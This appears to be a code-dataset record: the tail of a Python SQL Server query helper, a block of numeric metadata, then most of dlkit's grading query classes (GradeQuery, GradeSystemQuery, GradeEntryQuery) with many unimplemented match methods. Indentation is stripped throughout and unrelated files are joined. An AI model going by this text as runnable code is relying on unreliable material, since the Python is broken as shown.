user=self.user,
password=password,
)
# try to execute query
# context manager automatically rolls back failed transactions
try:
with cnxn.cursor() as crsr:
if data:
crsr.execute(query, data)
else:
crsr.execute(query)
# fetch results
if fetch == "all":
records = crsr.fetchall()
elif fetch == "many":
records = crsr.fetchmany(fetch_count)
else:
records = crsr.fetchone()
if commit:
cnxn.commit()
return records
# ensure connection is closed
finally:
cnxn.close()
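# Illustrative sketch (editorial addition, hypothetical names): fetch="one"
# returns a single row, fetch="many" returns up to fetch_count rows, and
# fetch="all" returns the entire result set.
#
#     fetch_users = SqlServerFetch(
#         db_name="mydb", user="etl", host="db.example.com",
#         query="SELECT name FROM users WHERE active = ?",
#         fetch="many", fetch_count=50,
#     )
#     # inside a Flow:
#     #     records = fetch_users(data=(1,), password=password)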
| 33.454819
| 101
| 0.561088
| 1,254
| 11,107
| 4.922648
| 0.11563
| 0.026243
| 0.041309
| 0.020411
| 0.84416
| 0.84416
| 0.84011
| 0.828122
| 0.828122
| 0.828122
| 0
| 0.005379
| 0.364005
| 11,107
| 331
| 102
| 33.555891
| 0.868488
| 0.470334
| 0
| 0.805714
| 0
| 0.005714
| 0.069613
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034286
| false
| 0.034286
| 0.017143
| 0
| 0.085714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
df6dd1c41c7b84e6eb7c618dce2d2c2c03281981
| 88,867
|
py
|
Python
|
dlkit/json_/grading/queries.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 2
|
2018-02-23T12:16:11.000Z
|
2020-10-08T17:54:24.000Z
|
dlkit/json_/grading/queries.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 87
|
2017-04-21T18:57:15.000Z
|
2021-12-13T19:43:57.000Z
|
dlkit/json_/grading/queries.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 1
|
2018-03-01T16:44:25.000Z
|
2018-03-01T16:44:25.000Z
|
"""JSON implementations of grading queries."""
# pylint: disable=no-init
# Numerous classes don't require __init__.
# pylint: disable=too-many-public-methods,too-few-public-methods
# Number of methods are defined in specification
# pylint: disable=protected-access
# Access to protected methods allowed in package json package scope
# pylint: disable=too-many-ancestors
# Inheritance defined in specification
from .. import utilities
from ..id.objects import IdList
from ..osid import queries as osid_queries
from ..primitives import Id
from ..utilities import get_registry
from dlkit.abstract_osid.grading import queries as abc_grading_queries
from dlkit.abstract_osid.osid import errors
class GradeQuery(abc_grading_queries.GradeQuery, osid_queries.OsidObjectQuery, osid_queries.OsidSubjugateableQuery):
"""This is the query for searching gradings.
Each method match request produces an ``AND`` term while multiple
invocations of a method produces a nested ``OR``.
"""
def __init__(self, runtime):
self._namespace = 'grading.Grade'
self._runtime = runtime
record_type_data_sets = get_registry('GRADE_RECORD_TYPES', runtime)
self._all_supported_record_type_data_sets = record_type_data_sets
self._all_supported_record_type_ids = []
for data_set in record_type_data_sets:
self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
osid_queries.OsidObjectQuery.__init__(self, runtime)
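# Illustrative sketch (editorial addition, hypothetical Ids): repeated calls
# to the same match method OR together, while different match methods AND
# together; the property(fdel=...) attributes clear accumulated terms.
#
#     query.match_grade_system_id(gs_id_1, match=True)
#     query.match_grade_system_id(gs_id_2, match=True)   # gs_id_1 OR gs_id_2
#     query.match_gradebook_id(gb_id, match=True)        # AND this gradebook
#     del query.grade_system_id_terms                    # drop the OR clause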
@utilities.arguments_not_none
def match_grade_system_id(self, grade_system_id, match):
"""Sets the grade system ``Id`` for this query.
arg: grade_system_id (osid.id.Id): a grade system ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: NullArgument - ``grade_system_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('gradeSystemId', str(grade_system_id), match)
def clear_grade_system_id_terms(self):
"""Clears the grade system ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('gradeSystemId')
grade_system_id_terms = property(fdel=clear_grade_system_id_terms)
def supports_grade_system_query(self):
"""Tests if a ``GradeSystemQuery`` is available for querying grade systems.
return: (boolean) - ``true`` if a grade system query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grade_system_query(self):
"""Gets the query for a grade system.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeSystemQuery) - the grade system query
raise: Unimplemented - ``supports_grade_system_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_grade_system_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grade_system_query = property(fget=get_grade_system_query)
def clear_grade_system_terms(self):
"""Clears the grade system terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('gradeSystem')
grade_system_terms = property(fdel=clear_grade_system_terms)
@utilities.arguments_not_none
def match_input_score_start_range(self, start, end, match):
"""Matches grades with the start input score inclusive.
arg: start (decimal): start of range
arg: end (decimal): end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: InvalidArgument - ``start`` is greater than ``end``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_input_score_start_range_terms(self):
"""Clears the nput score start range terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('inputScoreStartRange')
input_score_start_range_terms = property(fdel=clear_input_score_start_range_terms)
@utilities.arguments_not_none
def match_input_score_end_range(self, start, end, match):
"""Matches grades with the end input score inclusive.
arg: start (decimal): start of range
arg: end (decimal): end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: InvalidArgument - ``start`` is greater than ``end``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_input_score_end_range_terms(self):
"""Clears the nput score start range terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('inputScoreEndRange')
input_score_end_range_terms = property(fdel=clear_input_score_end_range_terms)
@utilities.arguments_not_none
def match_input_score(self, start, end, match):
"""Matches grades with the input score range contained within the given range inclusive.
arg: start (decimal): start of range
arg: end (decimal): end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: InvalidArgument - ``start`` is greater than ``end``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_input_score_terms(self):
"""Clears the input score start range terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
input_score_terms = property(fdel=clear_input_score_terms)
@utilities.arguments_not_none
def match_output_score(self, start, end, match):
"""Matches grades with the output score contained within the given range inclusive.
arg: start (decimal): start of range
arg: end (decimal): end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: InvalidArgument - ``start`` is greater than ``end``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_output_score_terms(self):
"""Clears the output score terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('outputScore')
output_score_terms = property(fdel=clear_output_score_terms)
@utilities.arguments_not_none
def match_grade_entry_id(self, grade_entry_id, match):
"""Sets the grade entry ``Id`` for this query.
arg: grade_entry_id (osid.id.Id): a grade entry ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: NullArgument - ``grade_entry_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('gradeEntryId', str(grade_entry_id), match)
def clear_grade_entry_id_terms(self):
"""Clears the grade entry ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('gradeEntryId')
grade_entry_id_terms = property(fdel=clear_grade_entry_id_terms)
def supports_grade_entry_query(self):
"""Tests if a ``GradeEntryQuery`` is available for querying grade entries.
return: (boolean) - ``true`` if a grade entry query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grade_entry_query(self):
"""Gets the query for a grade entry.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeEntryQuery) - the grade entry query
raise: Unimplemented - ``supports_grade_entry_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_grade_entry_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grade_entry_query = property(fget=get_grade_entry_query)
@utilities.arguments_not_none
def match_any_grade_entry(self, match):
"""Matches grades that are assigned to any grade entry.
arg: match (boolean): ``true`` to match grades used in any
grade entry, ``false`` to match grades that are not used
in any grade entries
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grade_entry_terms(self):
"""Clears the grade entry terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
grade_entry_terms = property(fdel=clear_grade_entry_terms)
@utilities.arguments_not_none
def match_gradebook_id(self, gradebook_id, match):
"""Sets the gradebook ``Id`` for this query.
arg: gradebook_id (osid.id.Id): a gradebook ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: NullArgument - ``gradebook_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_bin_id
self._add_match('assignedGradebookIds', str(gradebook_id), match)
def clear_gradebook_id_terms(self):
"""Clears the gradebook ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_bin_id_terms
self._clear_terms('assignedGradebookIds')
gradebook_id_terms = property(fdel=clear_gradebook_id_terms)
def supports_gradebook_query(self):
"""Tests if a ``GradebookQuery`` is available.
return: (boolean) - ``true`` if a gradebook query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_query(self):
"""Gets the query for a gradebook.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookQuery) - the gradebook query
raise: Unimplemented - ``supports_gradebook_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_query = property(fget=get_gradebook_query)
def clear_gradebook_terms(self):
"""Clears the gradebook terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('gradebook')
gradebook_terms = property(fdel=clear_gradebook_terms)
@utilities.arguments_not_none
def get_grade_query_record(self, grade_record_type):
"""Gets the grade query record corresponding to the given ``Grade`` record ``Type``.
Multiple retrievals produce a nested ``OR`` term.
arg: grade_record_type (osid.type.Type): a grade record type
return: (osid.grading.records.GradeQueryRecord) - the grade
query record
raise: NullArgument - ``grade_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: Unsupported - ``has_record_type(grade_record_type)`` is
``false``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
class GradeSystemQuery(abc_grading_queries.GradeSystemQuery, osid_queries.OsidObjectQuery, osid_queries.OsidAggregateableQuery):
"""This is the query for searching grade systems.
Each method match request produces an ``AND`` term while multiple
invocations of a method produces a nested ``OR``.
"""
def __init__(self, runtime):
self._namespace = 'grading.GradeSystem'
self._runtime = runtime
record_type_data_sets = get_registry('GRADE_SYSTEM_RECORD_TYPES', runtime)
self._all_supported_record_type_data_sets = record_type_data_sets
self._all_supported_record_type_ids = []
for data_set in record_type_data_sets:
self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
osid_queries.OsidObjectQuery.__init__(self, runtime)
@utilities.arguments_not_none
def match_based_on_grades(self, match):
"""Matches grade systems based on grades.
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_based_on_grades_terms(self):
"""Clears the grade ``based`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('basedOnGrades')
based_on_grades_terms = property(fdel=clear_based_on_grades_terms)
@utilities.arguments_not_none
def match_grade_id(self, grade_id, match):
"""Sets the grade ``Id`` for this query.
arg: grade_id (osid.id.Id): a grade ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: NullArgument - ``grade_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('gradeId', str(grade_id), match)
def clear_grade_id_terms(self):
"""Clears the grade ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('gradeId')
grade_id_terms = property(fdel=clear_grade_id_terms)
def supports_grade_query(self):
"""Tests if a ``GradeQuery`` is available for querying grades.
return: (boolean) - ``true`` if a grade query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grade_query(self):
"""Gets the query for a grade.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeQuery) - the grade query
raise: Unimplemented - ``supports_grade_query()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_grade_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grade_query = property(fget=get_grade_query)
@utilities.arguments_not_none
def match_any_grade(self, match):
"""Matches grade systems with any grade.
arg: match (boolean): ``true`` to match grade systems with
any grade, ``false`` to match systems with no grade
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grade_terms(self):
"""Clears the grade terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
grade_terms = property(fdel=clear_grade_terms)
@utilities.arguments_not_none
def match_lowest_numeric_score(self, start, end, match):
"""Matches grade systems whose low end score falls in the specified range inclusive.
arg: start (decimal): low end of range
arg: end (decimal): high end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: InvalidArgument - ``end`` is less than ``start``
raise: NullArgument - ``grade_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_lowest_numeric_score_terms(self):
"""Clears the lowest numeric score terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('lowestNumericScore')
lowest_numeric_score_terms = property(fdel=clear_lowest_numeric_score_terms)
@utilities.arguments_not_none
def match_numeric_score_increment(self, start, end, match):
"""Matches grade systems numeric score increment is between the specified range inclusive.
arg: start (decimal): low end of range
arg: end (decimal): high end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: InvalidArgument - ``end`` is less than ``start``
raise: NullArgument - ``grade_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_numeric_score_increment_terms(self):
"""Clears the numeric score increment terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('numericScoreIncrement')
numeric_score_increment_terms = property(fdel=clear_numeric_score_increment_terms)
@utilities.arguments_not_none
def match_highest_numeric_score(self, start, end, match):
"""Matches grade systems whose high end score falls in the specified range inclusive.
arg: start (decimal): low end of range
arg: end (decimal): high end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: InvalidArgument - ``end`` is less than ``start``
raise: NullArgument - ``grade_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_highest_numeric_score_terms(self):
"""Clears the highest numeric score terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('highestNumericScore')
highest_numeric_score_terms = property(fdel=clear_highest_numeric_score_terms)
@utilities.arguments_not_none
def match_gradebook_column_id(self, gradebook_column_id, match):
"""Sets the gradebook column ``Id`` for this query.
arg: gradebook_column_id (osid.id.Id): a gradebook column
``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: NullArgument - ``gradebook_column_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('gradebookColumnId', str(gradebook_column_id), match)
def clear_gradebook_column_id_terms(self):
"""Clears the gradebook column ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('gradebookColumnId')
gradebook_column_id_terms = property(fdel=clear_gradebook_column_id_terms)
def supports_gradebook_column_query(self):
"""Tests if a ``GradebookColumnQuery`` is available.
return: (boolean) - ``true`` if a gradebook column query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_column_query(self):
"""Gets the query for a gradebook column.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookColumnQuery) - the gradebook
column query
raise: Unimplemented - ``supports_gradebook_column_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_column_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_column_query = property(fget=get_gradebook_column_query)
@utilities.arguments_not_none
def match_any_gradebook_column(self, match):
"""Matches grade systems assigned to any gradebook column.
arg: match (boolean): ``true`` to match grade systems mapped
to any column, ``false`` to match systems mapped to no
columns
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_gradebook_column_terms(self):
"""Clears the gradebook column terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
gradebook_column_terms = property(fdel=clear_gradebook_column_terms)
@utilities.arguments_not_none
def match_gradebook_id(self, gradebook_id, match):
"""Sets the gradebook ``Id`` for this query.
arg: gradebook_id (osid.id.Id): a gradebook ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for negative match
raise: NullArgument - ``gradebook_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_bin_id
self._add_match('assignedGradebookIds', str(gradebook_id), match)
def clear_gradebook_id_terms(self):
"""Clears the gradebook ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_bin_id_terms
self._clear_terms('assignedGradebookIds')
gradebook_id_terms = property(fdel=clear_gradebook_id_terms)
def supports_gradebook_query(self):
"""Tests if a ``GradebookQuery`` is available.
return: (boolean) - ``true`` if a gradebook query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_query(self):
"""Gets the query for a gradebook.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookQuery) - the gradebook query
raise: Unimplemented - ``supports_gradebook_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_query = property(fget=get_gradebook_query)
def clear_gradebook_terms(self):
"""Clears the gradebook terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('gradebook')
gradebook_terms = property(fdel=clear_gradebook_terms)
@utilities.arguments_not_none
def get_grade_system_query_record(self, grade_system_record_type):
"""Gets the grade system query record corresponding to the given ``GradeSystem`` record ``Type``.
Multiple retrievals produce a nested ``OR`` term.
arg: grade_system_record_type (osid.type.Type): a grade
system record type
return: (osid.grading.records.GradeSystemQueryRecord) - the
grade system query record
raise: NullArgument - ``grade_system_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: Unsupported -
``has_record_type(grade_system_record_type)`` is
``false``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
class GradeEntryQuery(abc_grading_queries.GradeEntryQuery, osid_queries.OsidRelationshipQuery):
"""This is the query for searching grade entries.
Each method match request produces an ``AND`` term while multiple
invocations of a method produces a nested ``OR``.
"""
def __init__(self, runtime):
self._namespace = 'grading.GradeEntry'
self._runtime = runtime
record_type_data_sets = get_registry('GRADE_ENTRY_RECORD_TYPES', runtime)
self._all_supported_record_type_data_sets = record_type_data_sets
self._all_supported_record_type_ids = []
for data_set in record_type_data_sets:
self._all_supported_record_type_ids.append(str(Id(**record_type_data_sets[data_set])))
osid_queries.OsidObjectQuery.__init__(self, runtime)
@utilities.arguments_not_none
def match_gradebook_column_id(self, gradebook_column_id, match):
"""Sets the gradebook column ``Id`` for this query.
arg: gradebook_column_id (osid.id.Id): a gradebook column
``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``gradebook_column_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
self._add_match('gradebookColumnId',
str(gradebook_column_id),
match)
def clear_gradebook_column_id_terms(self):
"""Clears the gradebook column ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('gradebookColumnId')
gradebook_column_id_terms = property(fdel=clear_gradebook_column_id_terms)
def supports_gradebook_column_query(self):
"""Tests if a ``GradebookColumnQuery`` is available for querying creators.
return: (boolean) - ``true`` if a gradebook column query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_gradebook_column_query(self):
"""Gets the query for a gradebook column.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradebookColumnQuery) - the gradebook
column query
raise: Unimplemented - ``supports_gradebook_column_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_gradebook_column_query()`` is ``true``.*
"""
raise errors.Unimplemented()
gradebook_column_query = property(fget=get_gradebook_column_query)
def clear_gradebook_column_terms(self):
"""Clears the gradebook column terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('gradebookColumn')
gradebook_column_terms = property(fdel=clear_gradebook_column_terms)
@utilities.arguments_not_none
def match_key_resource_id(self, resource_id, match):
"""Sets the key resource ``Id`` for this query.
arg: resource_id (osid.id.Id): a resource ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``resource_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('keyResourceId', str(resource_id), match)
def clear_key_resource_id_terms(self):
"""Clears the key resource ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('keyResourceId')
key_resource_id_terms = property(fdel=clear_key_resource_id_terms)
def supports_key_resource_query(self):
"""Tests if a ``ResourceQUery`` is available for querying key resources.
return: (boolean) - ``true`` if a resource query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_key_resource_query(self):
"""Gets the query for a key resource.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.resource.ResourceQuery) - the resource query
raise: Unimplemented - ``supports_key_resource_query()`` is
``false``
*compliance: optional -- This method must be implemented if
``supports_key_resource_query()`` is ``true``.*
"""
raise errors.Unimplemented()
key_resource_query = property(fget=get_key_resource_query)
@utilities.arguments_not_none
def match_any_key_resource(self, match):
"""Matches grade entries with any key resource.
arg: match (boolean): ``true`` to match grade entries with
any key resource, ``false`` to match entries with no key
resource
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_key_resource_terms(self):
"""Clears the key resource terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
key_resource_terms = property(fdel=clear_key_resource_terms)
@utilities.arguments_not_none
def match_derived(self, match):
"""Matches derived grade entries.
arg: match (boolean): ``true`` to match derived grade entries,
``false`` to match manual entries
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_derived_terms(self):
"""Clears the derived terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
derived_terms = property(fdel=clear_derived_terms)
@utilities.arguments_not_none
def match_overridden_grade_entry_id(self, grade_entry_id, match):
"""Sets the grade entry ``Id`` for an overridden calculated grade entry.
arg: grade_entry_id (osid.id.Id): a grade entry ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``grade_entry_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('overriddenGradeEntryId', str(grade_entry_id), match)
def clear_overridden_grade_entry_id_terms(self):
"""Clears the overridden grade entry ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('overriddenGradeEntryId')
overridden_grade_entry_id_terms = property(fdel=clear_overridden_grade_entry_id_terms)
def supports_overridden_grade_entry_query(self):
"""Tests if a ``GradeEntry`` is available for querying overridden calculated grade entries.
return: (boolean) - ``true`` if a grade entry query is
available, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_overridden_grade_entry_query(self):
"""Gets the query for an overridden derived grade entry.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeEntryQuery) - the grade entry query
raise: Unimplemented -
``supports_overridden_grade_entry_query()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_overridden_grade_entry_query()`` is ``true``.*
"""
raise errors.Unimplemented()
overridden_grade_entry_query = property(fget=get_overridden_grade_entry_query)
@utilities.arguments_not_none
def match_any_overridden_grade_entry(self, match):
"""Matches grade entries overriding any calculated grade entry.
arg: match (boolean): ``true`` to match grade entries
overriding any grade entry, ``false`` to match entries
not overriding any entry
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_overridden_grade_entry_terms(self):
"""Clears the overridden grade entry terms.
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
overridden_grade_entry_terms = property(fdel=clear_overridden_grade_entry_terms)
@utilities.arguments_not_none
def match_ignored_for_calculations(self, match):
"""Matches grade entries ignored for calculations.
arg: match (boolean): ``true`` to match grade entries ignored
for calculations, ``false`` to match entries used in
calculations
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_ignored_for_calculations_terms(self):
"""Clears the ignored for calculation entries terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('ignoredForCalculations')
ignored_for_calculations_terms = property(fdel=clear_ignored_for_calculations_terms)
@utilities.arguments_not_none
def match_grade_id(self, grade_id, match):
"""Sets the grade ``Id`` for this query.
arg: grade_id (osid.id.Id): a grade ``Id``
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: NullArgument - ``grade_id`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.match_avatar_id
self._add_match('gradeId', str(grade_id), match)
def clear_grade_id_terms(self):
"""Clears the grade ``Id`` terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_avatar_id
self._clear_terms('gradeId')
grade_id_terms = property(fdel=clear_grade_id_terms)
def supports_grade_query(self):
"""Tests if a ``GradeQuery`` is available for querying grades.
return: (boolean) - ``true`` if a grade query is available,
``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_grade_query(self):
"""Gets the query for a grade.
Multiple retrievals produce a nested ``OR`` term.
return: (osid.grading.GradeQuery) - the grade query
raise: Unimplemented - ``supports_grade_query()`` is ``false``
*compliance: optional -- This method must be implemented if
``supports_grade_query()`` is ``true``.*
"""
raise errors.Unimplemented()
grade_query = property(fget=get_grade_query)
@utilities.arguments_not_none
def match_any_grade(self, match):
"""Matches grade entries with any grade.
arg: match (boolean): ``true`` to match grade entries with
any grade, ``false`` to match entries with no grade
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_grade_terms(self):
"""Clears the grade terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('grade')
grade_terms = property(fdel=clear_grade_terms)
@utilities.arguments_not_none
def match_score(self, start, end, match):
"""Matches grade entries which score is between the specified score inclusive.
arg: start (decimal): start of range
arg: end (decimal): end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: InvalidArgument - ``end`` is less than ``start``
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def match_any_score(self, match):
"""Matches grade entries with any score.
arg: match (boolean): ``true`` to match grade entries with
any score, ``false`` to match entries with no score
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def clear_score_terms(self):
"""Clears the score terms.
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceQuery.clear_group_terms
self._clear_terms('score')
score_terms = property(fdel=clear_score_terms)
@utilities.arguments_not_none
def match_time_graded(self, start, end, match):
"""Matches grade entries which graded time is between the specified times inclusive.
arg: start (osid.calendaring.DateTime): start of range
arg: end (osid.calendaring.DateTime): end of range
arg: match (boolean): ``true`` for a positive match,
``false`` for a negative match
raise: InvalidArgument - ``end`` is less than ``start``
